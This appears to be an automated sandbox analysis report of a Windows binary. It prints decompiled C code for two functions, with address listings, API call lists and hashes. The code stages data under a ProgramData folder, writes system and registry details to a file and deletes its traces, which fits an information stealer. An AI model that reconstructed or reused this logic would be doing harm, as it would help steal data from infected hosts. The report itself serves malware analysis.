				intOrPtr _v20;
				signed int _v24;
				char _v1024;
				char _v1352;
				char _v41352;
				char _v42352;
				char _v43352;
				char _v44352;
				char _v45352;
				char _v46352;
				char _v47352;
				char _v48352;
				char _v49352;
				char _v50352;
				char _v51352;
				char _v52352;
				char _v53352;
				char _v54352;
				char _v55352;
				char _v56352;
				void* _v56356;
				void* _v56360;
				char _v56361;
				void* _v56368;
				unsigned int _v56372;
				void* _v56376;
				char _v56377;
				void* _v56384;
				void* _v56388;
				char _v56389;
				void* _v56396;
				signed int _v56400;
				void* _v56404;
				char _v56405;
				intOrPtr* _v56412;
				intOrPtr _v56416;
				char _v56417;
				intOrPtr _v56424;
				void* __edi;
				void* __esi;
				signed int _t155;
				signed int _t156;
				CHAR* _t182;
				CHAR* _t184;
				CHAR* _t186;
				CHAR* _t188;
				CHAR* _t190;
				CHAR* _t192;
				CHAR* _t194;
				CHAR* _t196;
				void* _t202;
				CHAR* _t205;
				intOrPtr _t215;
				CHAR* _t220;
				CHAR* _t225;
				CHAR* _t230;
				intOrPtr _t253;
				intOrPtr _t257;
				CHAR* _t260;
				CHAR* _t269;
				CHAR* _t273;
				void* _t277;
				intOrPtr _t313;
				intOrPtr _t317;
				CHAR* _t319;
				CHAR* _t321;
				intOrPtr _t332;
				CHAR* _t337;
				CHAR* _t338;
				CHAR* _t339;
				signed int _t350;
				int _t353;
				signed int _t361;
				int _t364;
				intOrPtr _t371;
				intOrPtr _t372;
				intOrPtr _t373;
				intOrPtr _t374;
				intOrPtr _t375;
				intOrPtr _t376;
				intOrPtr _t377;
				intOrPtr _t378;
				CHAR* _t379;
				CHAR* _t380;
				intOrPtr _t384;
				CHAR* _t388;
				CHAR* _t390;
				CHAR* _t403;
				CHAR* _t404;
				CHAR* _t405;
				signed int _t411;
				void* _t415;
				void* _t416;
				void* _t425;
				void* _t426;
				signed int _t427;
				void* _t428;
				void* _t466;
				void* _t470;
				void* _t475;

				_t475 = __eflags;
				_t294 = __ebx;
				E00412A40(0xdc58);
				_t155 =  *0x4301f4; // 0x3b2bc12f
				_t156 = _t155 ^ _t427;
				_v24 = _t156;
				 *[fs:0x0] =  &_v16;
				E004091C0( &_v42352, 0, 0x3e8);
				E004091C0( &_v56352, 0, 0x3e8);
				E004091C0( &_v55352, 0, 0x3e8);
				E004091C0( &_v47352, 0, 0x3e8);
				E004091C0( &_v52352, 0, 0x3e8);
				E004091C0( &_v54352, 0, 0x3e8);
				E004091C0( &_v1024, 0, 0x3e8);
				E004091C0( &_v53352, 0, 0x3e8);
				E004091C0( &_v46352, 0, 0x3e8);
				E004091C0( &_v51352, 0, 0x3e8);
				E004091C0( &_v49352, 0, 0x3e8);
				E004091C0( &_v45352, 0, 0x3e8);
				E004091C0( &_v48352, 0, 0x3e8);
				E004091C0( &_v50352, 0, 0x3e8);
				E004091C0( &_v44352, 0, 0x3e8);
				E004091C0( &_v43352, 0, 0x3e8);
				E004091C0( &_v41352, 0, 0x9c40);
				E00421620( &_v1352, _t415, _t425, 0x4294cf, 0xfde9, 0, 0, 0); // executed
				_v8 = 0;
				_t371 =  *0x4326d8; // 0x42a088
				_t182 =  *0x432244; // 0xc11530
				wsprintfA( &_v46352, _t182, _t371);
				_t372 =  *0x4326d8; // 0x42a088
				_t184 =  *0x432520; // 0xc15958
				wsprintfA( &_v51352, _t184, _t372);
				_t373 =  *0x4326d8; // 0x42a088
				_t186 =  *0x43252c; // 0xc15a18
				wsprintfA( &_v49352, _t186, _t373);
				_t374 =  *0x4326d8; // 0x42a088
				_t188 =  *0x4326e4; // 0xc15898
				wsprintfA( &_v45352, _t188, _t374);
				_t375 =  *0x4326d8; // 0x42a088
				_t190 =  *0x43259c; // 0xc15a00
				wsprintfA( &_v48352, _t190, _t375);
				_t376 =  *0x4326d8; // 0x42a088
				_t192 =  *0x43256c; // 0xc15910
				wsprintfA( &_v50352, _t192, _t376);
				_t377 =  *0x4326d8; // 0x42a088
				_t194 =  *0x432294; // 0xc158b0
				wsprintfA( &_v44352, _t194, _t377);
				_t378 =  *0x4326d8; // 0x42a088
				_t196 =  *0x4322e8; // 0xc158e0
				wsprintfA( &_v43352, _t196, _t378);
				_t379 =  *0x432570; // 0xc114b0
				 *0x4328c4( &_v55352, _t379, _t156, _t415, _t425,  *[fs:0x0], E0042673D, 0xffffffff);
				 *0x4328c4( &_v55352, E0041A580(_t379, _t415, _t425, _t475, 0xf));
				_t202 = E0041A580(_t379, _t415, _t425, _t475, 0xa);
				_t380 =  *0x4326f4; // 0xc115e8
				wsprintfA( &_v56352, _t380, _t202);
				_t205 =  *0x4322bc; // 0xc11490
				wsprintfA( &_v42352, _t205,  &_v55352,  &_v56352);
				 *0x4328c4( &_v47352,  &_v55352);
				_t313 =  *0x4322e0; // 0xc158c8
				 *0x4328c4( &_v47352, _t313);
				 *0x4328c4( &_v52352,  &_v55352);
				_t384 =  *0x4326a0; // 0xc110b0
				 *0x4328c4( &_v52352, _t384);
				 *0x4328c4( &_v54352,  &_v55352);
				_t215 =  *0x4322c4; // 0xc15a30
				 *0x4328c4( &_v54352, _t215);
				 *0x4328c4( &_v1024,  &_v55352);
				_t317 =  *0x4320c4; // 0xc176d8
				 *0x4328c4( &_v1024, _t317);
				_t220 =  *0x432618; // 0xc104a0
				E00420080(__ebx, _t415, _t425, _t475,  &_v50352, _t220); // executed
				_t388 =  *0x432568; // 0xc11548
				E00420080(__ebx, _t415, _t425, _t475,  &_v46352, _t388); // executed
				_t319 =  *0x4322f0; // 0xc11570
				E00420080(__ebx, _t415, _t425, _t475,  &_v51352, _t319); // executed
				_t225 =  *0x432398; // 0xc115f8
				E00420080(_t294, _t415, _t425, _t475,  &_v49352, _t225); // executed
				_t390 =  *0x432458; // 0xc11598
				E00420080(_t294, _t415, _t425, _t475,  &_v45352, _t390); // executed
				_t321 =  *0x432440; // 0xc115c0
				E00420080(_t294, _t415, _t425, _t475,  &_v48352, _t321); // executed
				_t230 =  *0x4320f4; // 0xc104c8
				E00420080(_t294, _t415, _t425, _t475,  &_v44352, _t230); // executed
				CreateDirectoryA( &_v55352, 0); // executed
				CreateDirectoryA( &_v47352, 0); // executed
				CreateDirectoryA( &_v52352, 0); // executed
				CreateDirectoryA( &_v54352, 0); // executed
				CreateDirectoryA( &_v1024, 0); // executed
				SetCurrentDirectoryA( &_v55352); // executed
				_push( &_v55352); // executed
				E0041EBD0(_t294, _t415, _t425); // executed
				SetCurrentDirectoryA( &_v55352); // executed
				E0041F330( &_v55352); // executed
				E00424F00(_t294, _t415, _t425,  &_v55352); // executed
				_t466 = _t428 + 0x190;
				SetCurrentDirectoryA( &_v55352); // executed
				if(E00422460(_t294,  &_v1352, _t415, _t425,  &_v43352) != 0) {
					_v56356 = E004214D0( &_v1352);
					_v56360 = _v56356;
					do {
						_v56361 =  *_v56356;
						_v56356 = _v56356 + 1;
					} while (_v56361 != 0);
					_v56368 = _v56360;
					_v56372 = _v56356 - _v56360;
					_v56376 =  &_v41352 + 0xffffffff;
					do {
						_v56377 =  *((intOrPtr*)(_v56376 + 1));
						_v56376 = _v56376 + 1;
					} while (_v56377 != 0);
					_t425 = _v56368;
					_t361 = _v56372 >> 2;
					_t364 = memcpy(_v56376, _t425, _t361 << 2) & 0x00000003;
					memcpy(_t425 + _t361 + _t361, _t425, _t364);
					_t466 = _t466 + 0x18;
					_t415 = _t425 + _t364 + _t364;
				}
				E00421580( &_v1352);
				E00420A30(_t294, _t415, _t425,  &_v41352,  &_v55352);
				SetCurrentDirectoryA( &_v55352); // executed
				E0041FC30(_t294,  &_v55352, _t415, _t425); // executed
				_t253 = E00416CE0( &_v56352, 0); // executed
				_v20 = _t253;
				E00420540(_t294, _t415, _t425, _v20, 0x4294df,  &_v55352); // executed
				E00417A10(_v20); // executed
				_t470 = _t466 + 0x20;
				_t257 =  *0x4320e8; // 0xc110c0
				E004218C0(_t294,  &_v1352,  &_v56352, _t415, _t425, _t257,  &_v56352);
				_t332 =  *0x4326d8; // 0x42a088
				if(E00422460(_t294,  &_v1352, _t415, _t425, _t332) != 0) {
					_v56384 = E004214D0( &_v1352);
					_v56388 = _v56384;
					do {
						_v56389 =  *_v56384;
						_v56384 = _v56384 + 1;
					} while (_v56389 != 0);
					_v56396 = _v56388;
					_v56400 = _v56384 - _v56388;
					_v56404 =  &_v53352 + 0xffffffff;
					do {
						_v56405 =  *((intOrPtr*)(_v56404 + 1));
						_v56404 = _v56404 + 1;
					} while (_v56405 != 0);
					_t425 = _v56396;
					_t411 = _v56400;
					_t350 = _t411 >> 2;
					memcpy(_v56404, _t425, _t350 << 2);
					_t353 = _t411 & 0x00000003;
					memcpy(_t425 + _t350 + _t350, _t425, _t353);
					_t470 = _t470 + 0x18;
					_t415 = _t425 + _t353 + _t353;
				}
				_t260 =  *0x432570; // 0xc114b0
				SetCurrentDirectoryA(_t260); // executed
				_v56412 =  &_v53352;
				_v56416 = _v56412 + 1;
				do {
					_v56417 =  *_v56412;
					_v56412 = _v56412 + 1;
				} while (_v56417 != 0);
				_v56424 = _v56412 - _v56416;
				_t488 = _v56424 - 4;
				if(_v56424 > 4) {
					E00420130(_t294, _t415, _t425, _t488,  &_v53352);
					_t470 = _t470 + 4;
				}
				E0041F540( &_v55352); // executed
				_t403 =  *0x432570; // 0xc114b0
				SetCurrentDirectoryA(_t403); // executed
				RemoveDirectoryA( &_v55352);
				_t337 =  *0x432568; // 0xc11548
				DeleteFileA(_t337);
				_t404 =  *0x4322f0; // 0xc11570
				DeleteFileA(_t404);
				_t269 =  *0x432398; // 0xc115f8
				DeleteFileA(_t269);
				_t338 =  *0x432458; // 0xc11598
				DeleteFileA(_t338);
				_t405 =  *0x432440; // 0xc115c0
				DeleteFileA(_t405);
				_t273 =  *0x432618; // 0xc104a0
				DeleteFileA(_t273);
				_t339 =  *0x4320f4; // 0xc104c8
				DeleteFileA(_t339); // executed
				E0041A720(_t294, _t415, _t425, _t488,  &_v55352); // executed
				_v8 = 0xffffffff;
				_t277 = E004215C0( &_v1352); // executed
				 *[fs:0x0] = _v16;
				_pop(_t416);
				_pop(_t426);
				return E00404354(_t277, _t294, _v24 ^ _t427,  &_v55352, _t416, _t426);
			}

0x00420be0
0x00420be0
0x00420bf6
0x00420bfb
0x00420c00
0x00420c02
0x00420c0b
0x00420c1f
0x00420c35
0x00420c4b
0x00420c61
0x00420c77
0x00420c8d
0x00420ca3
0x00420cb9
0x00420ccf
0x00420ce5
0x00420cfb
0x00420d11
0x00420d27
0x00420d3d
0x00420d53
0x00420d69
0x00420d7f
0x00420d9d
0x00420da2
0x00420da9
0x00420db0
0x00420dbd
0x00420dc6
0x00420dcd
0x00420dda
0x00420de3
0x00420dea
0x00420df7
0x00420e00
0x00420e07
0x00420e14
0x00420e1d
0x00420e24
0x00420e31
0x00420e3a
0x00420e41
0x00420e4e
0x00420e57
0x00420e5e
0x00420e6b
0x00420e74
0x00420e7b
0x00420e88
0x00420e91
0x00420e9f
0x00420eb7
0x00420ebf
0x00420ec8
0x00420ed6
0x00420eed
0x00420efa
0x00420f11
0x00420f17
0x00420f25
0x00420f39
0x00420f3f
0x00420f4d
0x00420f61
0x00420f67
0x00420f74
0x00420f88
0x00420f8e
0x00420f9c
0x00420fa2
0x00420faf
0x00420fb7
0x00420fc5
0x00420fcd
0x00420fdb
0x00420fe3
0x00420ff0
0x00420ff8
0x00421006
0x0042100e
0x0042101c
0x00421024
0x00421031
0x00421042
0x00421051
0x00421060
0x0042106f
0x0042107e
0x0042108b
0x00421097
0x00421098
0x004210a7
0x004210ad
0x004210b9
0x004210be
0x004210c8
0x004210e2
0x004210f3
0x004210ff
0x00421105
0x0042110d
0x00421113
0x0042111a
0x00421135
0x0042113b
0x0042114a
0x00421150
0x00421159
0x0042115f
0x00421166
0x00421175
0x00421183
0x0042118a
0x0042118d
0x0042118d
0x0042118d
0x0042118d
0x00421195
0x004211a8
0x004211b7
0x004211bd
0x004211cb
0x004211d3
0x004211e6
0x004211f2
0x004211f7
0x00421201
0x0042120d
0x00421212
0x00421226
0x00421237
0x00421243
0x00421249
0x00421251
0x00421257
0x0042125e
0x00421279
0x0042127f
0x0042128e
0x00421294
0x0042129d
0x004212a3
0x004212aa
0x004212b9
0x004212bf
0x004212c7
0x004212ca
0x004212ce
0x004212d1
0x004212d1
0x004212d1
0x004212d1
0x004212d3
0x004212d9
0x004212e5
0x004212f4
0x004212fa
0x00421302
0x00421308
0x0042130f
0x00421324
0x0042132a
0x00421331
0x0042133a
0x0042133f
0x0042133f
0x00421349
0x00421351
0x00421358
0x00421365
0x0042136b
0x00421372
0x00421378
0x0042137f
0x00421385
0x0042138b
0x00421391
0x00421398
0x0042139e
0x004213a5
0x004213ab
0x004213b1
0x004213b7
0x004213be
0x004213cb
0x004213d3
0x004213e0
0x004213e8
0x004213f0
0x004213f1
0x004213ff

APIs

_memset.LIBCMT ref: 00420C1F
_memset.LIBCMT ref: 00420C35
_memset.LIBCMT ref: 00420C4B
_memset.LIBCMT ref: 00420C61
_memset.LIBCMT ref: 00420C77
_memset.LIBCMT ref: 00420C8D
_memset.LIBCMT ref: 00420CA3
_memset.LIBCMT ref: 00420CB9
_memset.LIBCMT ref: 00420CCF
_memset.LIBCMT ref: 00420CE5
_memset.LIBCMT ref: 00420CFB
_memset.LIBCMT ref: 00420D11
_memset.LIBCMT ref: 00420D27
_memset.LIBCMT ref: 00420D3D
_memset.LIBCMT ref: 00420D53
_memset.LIBCMT ref: 00420D69
_memset.LIBCMT ref: 00420D7F

Part of subcall function 00421620: _memset.LIBCMT ref: 00421634
Part of subcall function 00421620: _strcpy_s.LIBCMT ref: 00421653
Part of subcall function 00421620: _memset.LIBCMT ref: 0042168E

wsprintfA.USER32 ref: 00420DBD
wsprintfA.USER32 ref: 00420DDA
wsprintfA.USER32 ref: 00420DF7
wsprintfA.USER32 ref: 00420E14
wsprintfA.USER32 ref: 00420E31
wsprintfA.USER32 ref: 00420E4E
wsprintfA.USER32 ref: 00420E6B
wsprintfA.USER32 ref: 00420E88
lstrcat.KERNEL32(?,00C114B0), ref: 00420E9F

Part of subcall function 0041A580: _malloc.LIBCMT ref: 0041A58A
Part of subcall function 0041A580: GetTickCount.KERNEL32 ref: 0041A59B
Part of subcall function 0041A580: _rand.LIBCMT ref: 0041A5C4
Part of subcall function 0041A580: wsprintfA.USER32 ref: 0041A5E0

lstrcat.KERNEL32(?,00000000), ref: 00420EB7
wsprintfA.USER32 ref: 00420ED6
wsprintfA.USER32 ref: 00420EFA
lstrcat.KERNEL32(?,?), ref: 00420F11
lstrcat.KERNEL32(?,00C158C8), ref: 00420F25
lstrcat.KERNEL32(?,?), ref: 00420F39
lstrcat.KERNEL32(?,00C110B0), ref: 00420F4D
lstrcat.KERNEL32(?,?), ref: 00420F61
lstrcat.KERNEL32(?,00C15A30), ref: 00420F74
lstrcat.KERNEL32(?,?), ref: 00420F88
lstrcat.KERNEL32(?,00C176D8), ref: 00420F9C
CreateDirectoryA.KERNEL32(?,00000000), ref: 00421042
CreateDirectoryA.KERNEL32(?,00000000), ref: 00421051
CreateDirectoryA.KERNEL32(?,00000000), ref: 00421060
CreateDirectoryA.KERNEL32(?,00000000), ref: 0042106F
CreateDirectoryA.KERNEL32(?,00000000), ref: 0042107E
SetCurrentDirectoryA.KERNEL32(?), ref: 0042108B

Part of subcall function 0041EBD0: _memset.LIBCMT ref: 0041EBF8

SetCurrentDirectoryA.KERNEL32(?), ref: 004210A7

Part of subcall function 00424F00: _memset.LIBCMT ref: 00424F0F
Part of subcall function 00424F00: lstrcat.KERNEL32(C:\\ProgramData\\734573140483756,004210BE), ref: 00424F20

SetCurrentDirectoryA.KERNEL32(?), ref: 004210C8

Part of subcall function 00422460: __mbstowcs_l.LIBCMTD ref: 00422593

SetCurrentDirectoryA.KERNEL32(?,?,?), ref: 004211B7
SetCurrentDirectoryA.KERNEL32(00C114B0,0042A088,00C110C0,?,?,?,?,?,?,?,?,?), ref: 004212D9
SetCurrentDirectoryA.KERNEL32(00C114B0,?,?,?,?,?,?,?,?,?), ref: 00421358
RemoveDirectoryA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00421365
DeleteFileA.KERNEL32(00C11548,?,?,?,?,?,?,?,?,?), ref: 00421372
DeleteFileA.KERNEL32(00C11570,?,?,?,?,?,?,?,?,?), ref: 0042137F
DeleteFileA.KERNEL32(00C115F8,?,?,?,?,?,?,?,?,?), ref: 0042138B
DeleteFileA.KERNEL32(00C11598,?,?,?,?,?,?,?,?,?), ref: 00421398
DeleteFileA.KERNEL32(00C115C0,?,?,?,?,?,?,?,?,?), ref: 004213A5
DeleteFileA.KERNEL32(00C104A0,?,?,?,?,?,?,?,?,?), ref: 004213B1
DeleteFileA.KERNEL32(00C104C8,?,?,?,?,?,?,?,?,?), ref: 004213BE

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memset$Directory$lstrcatwsprintf$DeleteFile$Current$Create$CountRemoveTick__mbstowcs_l_malloc_rand_strcpy_s
String ID:
API String ID: 3016932189-0
Opcode ID: cbfad0e375860adb4d06db9ddde89303de32c4b1c5cf1502787c92192467c048
Instruction ID: 7bf28244e14e6d77cc8870e9b1224398cc7b19c98e316186366d6ff2b1321c67
Opcode Fuzzy Hash: cbfad0e375860adb4d06db9ddde89303de32c4b1c5cf1502787c92192467c048
Instruction Fuzzy Hash: 2F22DA72D00219ABDB14EBA0ED45EDA73B8BF58304F0445EAF109A7191DFB49B88CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0041FC30, Relevance: 76.8, APIs: 51, Instructions: 339
COMMON

Download Yara Rule

C-Code - Quality: 31%

			E0041FC30(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				void* __ebp;
				intOrPtr _t55;
				intOrPtr _t56;
				void* _t57;
				void* _t61;
				void* _t69;
				void* _t81;
				void* _t85;
				void* _t89;
				void* _t93;
				void* _t97;
				void* _t104;
				void* _t108;
				void* _t120;
				void* _t135;
				void* _t151;
				intOrPtr _t157;
				intOrPtr _t183;
				intOrPtr _t184;
				intOrPtr _t185;
				intOrPtr _t186;
				intOrPtr _t187;
				intOrPtr _t188;
				intOrPtr _t189;
				intOrPtr _t190;
				intOrPtr _t191;
				intOrPtr _t192;
				intOrPtr _t193;
				intOrPtr _t194;
				intOrPtr _t195;
				intOrPtr _t196;
				intOrPtr _t197;
				intOrPtr _t198;
				intOrPtr _t199;
				intOrPtr _t200;
				intOrPtr _t201;
				intOrPtr _t202;
				intOrPtr _t203;
				intOrPtr _t204;
				intOrPtr _t205;
				intOrPtr _t206;
				intOrPtr _t207;

				_t210 = __esi;
				_t209 = __edi;
				_t155 = __ebx;
				_t55 =  *0x4321d0; // 0xc110d8
				_t157 =  *0x432608; // 0xc110e8
				_t56 = E004055AB(_t157, _t55); // executed
				_v8 = _t56;
				_t266 = _v8;
				if(_v8 != 0) {
					_t183 =  *0x432600; // 0xc11100
					_push(_t183);
					_push(_v8);
					E004055C2(__ebx, __edi, __esi, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(__ebx, __edi, __esi, _t266);
					_t61 = E0041B260(); // executed
					_push(_t61);
					_t184 =  *0x43236c; // 0xc11148
					_push(_t184);
					_push(_v8);
					E004055C2(__ebx, __edi, __esi, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push(E0041B220(_v8));
					_t185 =  *0x432494; // 0xc11160
					_push(_t185);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_t69 = E0041B1E0(); // executed
					_push(_t69);
					_t186 =  *0x432694; // 0xc11170
					_push(_t186);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push(E0041B2E0());
					_t187 =  *0x432550; // 0xc11188
					_push(_t187);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push(E0041ABD0(_t155, _t209, _t210));
					_t188 =  *0x43214c; // 0xc111b0
					_push(_t188);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_t81 = E0041B0E0(); // executed
					_push(_t81);
					_t189 =  *0x43248c; // 0xc111d8
					_push(_t189);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_t85 = E0041B160(); // executed
					_push(_t85);
					_t190 =  *0x4321f8; // 0xc111f0
					_push(_t190);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_t89 = E0041B570(); // executed
					_push(_t89);
					_t191 =  *0x43242c; // 0xc11208
					_push(_t191);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_t93 = E0041B500(); // executed
					_push(_t93);
					_t192 =  *0x432508; // 0xc11220
					_push(_t192);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_t97 = E0041AA60(_t155, _t209, _t210); // executed
					_push(_t97);
					_t193 =  *0x4320a4; // 0xc11238
					_push(_t193);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_t194 =  *0x432564; // 0xc11258
					_push(_t194);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_t104 = E0041B460(); // executed
					_push(_t104);
					_t195 =  *0x4325c8; // 0xc112a0
					_push(_t195);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_t108 = E0041B4E0(); // executed
					_push(_t108);
					_t196 =  *0x432558; // 0xc112b8
					_push(_t196);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push(E0041B090());
					_t197 =  *0x43258c; // 0xc112d8
					_push(_t197);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push(E0041AF50());
					_t198 =  *0x432104; // 0xc112f0
					_push(_t198);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_t120 = E0041B340(_t155, _t209, _t210); // executed
					_push(_t120);
					_t199 =  *0x4321cc; // 0xc11308
					_push(_t199);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push(E0041AC40());
					_t200 =  *0x43215c; // 0xc11318
					_push(_t200);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_t201 =  *0x43228c; // 0xc11330
					_push(_t201);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push(E0041B610(_t155, _t201, _t209, _t210, 0));
					_t202 =  *0x432374; // 0xc11378
					_push(_t202);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_t135 = E0041AFE0(_t155, _t202, _t209, _t210); // executed
					_push(_t135);
					_t203 =  *0x432310; // 0xc11390
					_push(_t203);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_t204 =  *0x432348; // 0xc113a8
					_push(_t204);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_t205 =  *0x432198; // 0xc113f0
					_push(_t205);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_t206 =  *0x432538; // 0xc11400
					_push(_t206);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_t207 =  *0x4320d8; // 0xc11428
					_push(_t207);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_t151 = E0041AC90(_t155, _t209, _t210); // executed
					_push(_t151);
					_push(_v8); // executed
					E004055C2(_t155, _t209, _t210, _t266); // executed
					_push(_v8); // executed
					E00405EA3(_t155, _v8, _t209, _t210, _t266); // executed
				}
				_t57 = E0041A9D0(); // executed
				return _t57;
			}

0x0041fc30
0x0041fc30
0x0041fc30
0x0041fc34
0x0041fc3a
0x0041fc41
0x0041fc49
0x0041fc4c
0x0041fc50
0x0041fc56
0x0041fc5c
0x0041fc60
0x0041fc61
0x0041fc69
0x0041fc71
0x0041fc72
0x0041fc7a
0x0041fc7f
0x0041fc80
0x0041fc86
0x0041fc8a
0x0041fc8b
0x0041fc93
0x0041fc9b
0x0041fc9c
0x0041fca9
0x0041fcaa
0x0041fcb0
0x0041fcb4
0x0041fcb5
0x0041fcbd
0x0041fcc5
0x0041fcc6
0x0041fcce
0x0041fcd3
0x0041fcd4
0x0041fcda
0x0041fcde
0x0041fcdf
0x0041fce7
0x0041fcef
0x0041fcf0
0x0041fcfd
0x0041fcfe
0x0041fd04
0x0041fd08
0x0041fd09
0x0041fd11
0x0041fd19
0x0041fd1a
0x0041fd27
0x0041fd28
0x0041fd2e
0x0041fd32
0x0041fd33
0x0041fd3b
0x0041fd43
0x0041fd44
0x0041fd4c
0x0041fd51
0x0041fd52
0x0041fd58
0x0041fd5c
0x0041fd5d
0x0041fd65
0x0041fd6d
0x0041fd6e
0x0041fd76
0x0041fd7b
0x0041fd7c
0x0041fd82
0x0041fd86
0x0041fd87
0x0041fd8f
0x0041fd97
0x0041fd98
0x0041fda0
0x0041fda5
0x0041fda6
0x0041fdac
0x0041fdb0
0x0041fdb1
0x0041fdb9
0x0041fdc1
0x0041fdc2
0x0041fdca
0x0041fdcf
0x0041fdd0
0x0041fdd6
0x0041fdda
0x0041fddb
0x0041fde3
0x0041fdeb
0x0041fdec
0x0041fdf4
0x0041fdf9
0x0041fdfa
0x0041fe00
0x0041fe04
0x0041fe05
0x0041fe0d
0x0041fe15
0x0041fe16
0x0041fe1e
0x0041fe24
0x0041fe28
0x0041fe29
0x0041fe31
0x0041fe39
0x0041fe3a
0x0041fe42
0x0041fe47
0x0041fe48
0x0041fe4e
0x0041fe52
0x0041fe53
0x0041fe5b
0x0041fe63
0x0041fe64
0x0041fe6c
0x0041fe71
0x0041fe72
0x0041fe78
0x0041fe7c
0x0041fe7d
0x0041fe85
0x0041fe8d
0x0041fe8e
0x0041fe9b
0x0041fe9c
0x0041fea2
0x0041fea6
0x0041fea7
0x0041feaf
0x0041feb7
0x0041feb8
0x0041fec5
0x0041fec6
0x0041fecc
0x0041fed0
0x0041fed1
0x0041fed9
0x0041fee1
0x0041fee2
0x0041feea
0x0041feef
0x0041fef0
0x0041fef6
0x0041fefa
0x0041fefb
0x0041ff03
0x0041ff0b
0x0041ff0c
0x0041ff19
0x0041ff1a
0x0041ff20
0x0041ff24
0x0041ff25
0x0041ff2d
0x0041ff35
0x0041ff36
0x0041ff3e
0x0041ff44
0x0041ff48
0x0041ff49
0x0041ff51
0x0041ff59
0x0041ff5a
0x0041ff6c
0x0041ff6d
0x0041ff73
0x0041ff77
0x0041ff78
0x0041ff80
0x0041ff88
0x0041ff89
0x0041ff91
0x0041ff96
0x0041ff97
0x0041ff9d
0x0041ffa1
0x0041ffa2
0x0041ffaa
0x0041ffb2
0x0041ffb3
0x0041ffbb
0x0041ffc1
0x0041ffc5
0x0041ffc6
0x0041ffce
0x0041ffd6
0x0041ffd7
0x0041ffdf
0x0041ffe5
0x0041ffe9
0x0041ffea
0x0041fff2
0x0041fffa
0x0041fffb
0x00420003
0x00420009
0x0042000d
0x0042000e
0x00420016
0x0042001e
0x0042001f
0x00420027
0x0042002d
0x00420031
0x00420032
0x0042003a
0x00420042
0x00420043
0x0042004b
0x00420050
0x00420054
0x00420055
0x00420060
0x00420061
0x00420066
0x00420069
0x00420071

APIs

Part of subcall function 004055AB: __fsopen.LIBCMT ref: 004055B8

_fprintf.LIBCMT ref: 0041FC61
_fprintf.LIBCMT ref: 0041FC72

Part of subcall function 004055C2: __lock_file.LIBCMT ref: 00405609
Part of subcall function 004055C2: __stbuf.LIBCMT ref: 0040568D
Part of subcall function 004055C2: __output_l.LIBCMT ref: 0040569D
Part of subcall function 004055C2: __ftbuf.LIBCMT ref: 004056A7

Part of subcall function 0041B260: RegOpenKeyExA.KERNEL32(80000002,00C17048,00000000,00020119,?), ref: 0041B291
Part of subcall function 0041B260: RegQueryValueExA.KERNEL32(?,00C16B60,00000000,00000000,?,000000FF), ref: 0041B2B5
